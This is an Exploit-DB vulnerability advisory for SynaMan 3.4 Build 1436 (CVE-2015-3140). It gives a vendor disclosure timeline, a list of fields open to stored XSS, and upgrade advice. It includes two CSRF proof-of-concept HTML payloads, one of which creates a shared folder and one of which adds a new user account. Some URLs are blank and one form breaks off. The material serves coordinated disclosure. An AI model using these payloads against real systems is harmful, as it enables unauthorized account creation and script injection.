SynaMan <= 3.4 Build 1436 - Multiple Vulnerabilities

ID EDB-ID:36951
Type exploitdb
Reporter Marlow Tannhauser
Modified 2015-05-08T00:00:00


SynaMan <= 3.4 Build 1436 - Multiple Vulnerabilities. CVE-2015-3140. Webapps exploit for php platform

                                            # Exploit Title: Multiple vulnerabilities in SynaMan 3.4 Build 1436 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact:
# Vendor Homepage:
# Software Link:
# Version: 3.4 Build 1436. Earlier versions may also be affected.
# CVE: 2015-3140
# Category: Web apps

08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure

Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.

SynaMan 3.4 Build 1436 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.

# POC 1 #
The following PoC uses the CSRF vulnerability together with one of the stored XSS vulnerabilities, to create a new shared folder in the application.

&lt;img src="\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder" alt="" width="1" height="1"&gt;

# POC 2 #
The following PoC uses the CSRF vulnerability to create a new user with the details shown.

&lt;form name="evilform" method="post" action=""&gt;
&lt;input type="hidden" name="fullName" value="marlow"/&gt;
&lt;input type="hidden" name="login" value="" /&gt;
&lt;input type="hidden" name="password" value="marlow" /&gt;
&lt;input type="hidden" name="operation" value="mngUsers" /&gt;
&lt;input type="hidden" name="st" value="saveUser" /&gt;
&lt;input type="hidden" name="oldLogin" value="" /&gt;
&lt;input type="hidden" name="modifyUser" value="false" /&gt;
&lt;script type="text/javascript"&gt;

Stored XSS vulnerabilities are present in the following fields:

Managing Shared Folders &gt; Shared folder name field
Example URL:\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder

Manage Users &gt; Add a new user &gt; User's name field and Email/Login field
Example URL: POST request

Advanced Configuration &gt; Partial Branding &gt; Main heading field and Sub heading field
Affects all users on all pages, pre and post authentication
Example URL: POST request

Discovery Wizard &gt; Discovery Service Signup &gt; One-Word name
Example URL:

Upgrade to the latest build of SynaMan, available from the link shown.